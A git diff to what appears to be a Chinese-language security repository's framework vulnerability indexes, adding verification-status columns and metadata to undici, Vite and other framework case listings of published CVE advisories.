来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/spring-boot/INDEX.md b/07-framework-security/frameworks/spring-boot/INDEX.md index b358e435..091e1c0c 100644 --- a/07-framework-security/frameworks/spring-boot/INDEX.md +++ b/07-framework-security/frameworks/spring-boot/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/spring-framework/INDEX.md b/07-framework-security/frameworks/spring-framework/INDEX.md index 81305314..511ac8da 100644 --- a/07-framework-security/frameworks/spring-framework/INDEX.md +++ b/07-framework-security/frameworks/spring-framework/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/spring-security/INDEX.md b/07-framework-security/frameworks/spring-security/INDEX.md index ae1fd49f..f3da407c 100644 --- a/07-framework-security/frameworks/spring-security/INDEX.md +++ b/07-framework-security/frameworks/spring-security/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/sveltekit/INDEX.md b/07-framework-security/frameworks/sveltekit/INDEX.md index 77f42d6a..82ca997b 100644 --- a/07-framework-security/frameworks/sveltekit/INDEX.md +++ b/07-framework-security/frameworks/sveltekit/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/symfony/INDEX.md b/07-framework-security/frameworks/symfony/INDEX.md index 71bf2007..e33dd783 100644 --- a/07-framework-security/frameworks/symfony/INDEX.md +++ b/07-framework-security/frameworks/symfony/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/frameworks/undici/INDEX.md b/07-framework-security/frameworks/undici/INDEX.md index 2637b847..9eecbcb4 100644 --- a/07-framework-security/frameworks/undici/INDEX.md +++ b/07-framework-security/frameworks/undici/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `14` - 近 30 天新增/更新: `7` - 重点 Markdown 案例数: `14` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `14` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,19 +29,19 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) | -| Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) | -| Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) | -| Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) | -| Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) | -| Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) | -| Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) | -| undici Denial of Service attack via bad certificate data | `low` | `generated` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) | -| Use of Insufficiently Random Values in undici | `low` | `generated` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) | -| Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) | -| Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) | -| Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) | -| undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) | -| ProxyAgent vulnerable to MITM | `low` | `generated` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.563997Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md) | +| Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:26.149214Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md) | +| Undici has CRLF Injection in undici via `upgrade` option | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.572106Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md) | +| Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T20:54:25.417862Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md) | +| Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:17:45.838435Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md) | +| Undici has an HTTP Request/Response Smuggling issue | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-14T09:19:54.772219Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md) | +| Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:56:17.456091Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md) | +| undici Denial of Service attack via bad certificate data | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T22:08:08.311705Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md) | +| Use of Insufficiently Random Values in undici | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:29:26.373390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md) | +| Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:42Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md) | +| Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-11-04T19:44:28Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md) | +| Undici's cookie header not cleared on cross-origin redirect in fetch | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:35:56.289390Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md) | +| undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:02:08.652391Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md) | +| ProxyAgent vulnerable to MITM | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:15:23.541247Z` | [link](/Users/x/websafe/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md) | diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md b/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md index e5ad344f..e70398af 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:02:08.652391Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768- # undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2022-31151` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md b/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md index 03fd19b1..a80211f5 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:15:23.541247Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7- # ProxyAgent vulnerable to MITM +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2022-32210` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md b/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md index e7e355ed..7cded97b 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:35:56.289390Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -31,6 +35,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-q768- # Undici's cookie header not cleared on cross-origin redirect in fetch +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2023-45143` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md b/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md index f9442213..07160f3f 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md @@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:28Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8- # Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2024-30260` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md b/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md index b76f5fda..302c8d91 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md @@ -8,6 +8,10 @@ updated_date: "2025-11-04T19:44:42Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr- # Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2024-30261` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md b/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md index 61003adb..0157bad8 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:29:26.373390Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-c76h- # Use of Insufficiently Random Values in undici +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2025-22150` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md b/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md index 48b8b93b..07da4a33 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md @@ -8,6 +8,10 @@ updated_date: "2026-02-06T22:08:08.311705Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh- # undici Denial of Service attack via bad certificate data +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2025-47279` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md index 1314a1e2..3c52e682 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md @@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:19:54.772219Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp- # Undici has an HTTP Request/Response Smuggling issue +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-1525` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md index 4bfdd153..3b3fb98a 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.563997Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6- # Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-1526` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md index 9243e645..8ce7a8d1 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.572106Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-4992- # Undici has CRLF Injection in undici via `upgrade` option +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-1527` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md index 9b98d243..1bb0d32b 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md @@ -8,6 +8,10 @@ updated_date: "2026-03-14T09:17:45.838435Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-f269- # Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-1528` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md index 3ba80289..77b40bb3 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md @@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:56:17.456091Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -32,6 +36,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf- # Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-22036` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md index 5de805e5..f43ba439 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-2229.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:26.149214Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9- # Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-2229` diff --git a/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md b/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md index 880c9499..50502b51 100644 --- a/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md +++ b/07-framework-security/frameworks/undici/cases/undici-cve-2026-2581.md @@ -8,6 +8,10 @@ updated_date: "2026-03-13T20:54:25.417862Z" severity: "low" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -30,6 +34,15 @@ primary_source: "https://github.com/nodejs/undici/security/advisories/GHSA-phc3- # Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `undici--CVE-2026-2581` diff --git a/07-framework-security/frameworks/vite/INDEX.md b/07-framework-security/frameworks/vite/INDEX.md index 98bc42f3..f0b7887b 100644 --- a/07-framework-security/frameworks/vite/INDEX.md +++ b/07-framework-security/frameworks/vite/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `12` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `12` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `12` +- 最近渲染时间: `2026-03-17T06:28:45+00:00` ## 目标约束 @@ -26,17 +30,17 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| vite allows server.fs.deny bypass via backslash on Windows | `medium` | `generated` | `official` | `2026-02-04T04:13:38.886554Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-62522.md) | -| Vite middleware may serve files starting with the same name with the public directory | `medium` | `generated` | `official` | `2026-02-04T04:33:22.508417Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58751.md) | -| Vite's `server.fs` settings were not applied to HTML files | `medium` | `generated` | `official` | `2026-02-04T04:35:16.287471Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-58752.md) | -| Vite's server.fs.deny bypassed with /. for files under project root | `medium` | `generated` | `official` | `2026-02-04T03:27:17.681639Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-46565.md) | -| Vite has an `server.fs.deny` bypass with an invalid `request-target` | `medium` | `generated` | `official` | `2026-02-04T04:11:44.900383Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-32395.md) | -| Vite allows server.fs.deny to be bypassed with .svg or relative paths | `low` | `generated` | `official` | `2026-02-04T03:51:38.412061Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31486.md) | -| Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query | `low` | `generated` | `official` | `2026-02-04T04:37:24.129476Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-31125.md) | -| Vite bypasses server.fs.deny when using ?raw?? | `low` | `generated` | `official` | `2026-02-04T03:13:24.371631Z` | [link](/Users/x/websafe/07-framework-security/frameworks/vite/cases/vite-cve-2025-30208.md) | -| Websites were able to send any requests to the development server and read the response in vite | `low` | `generated` | 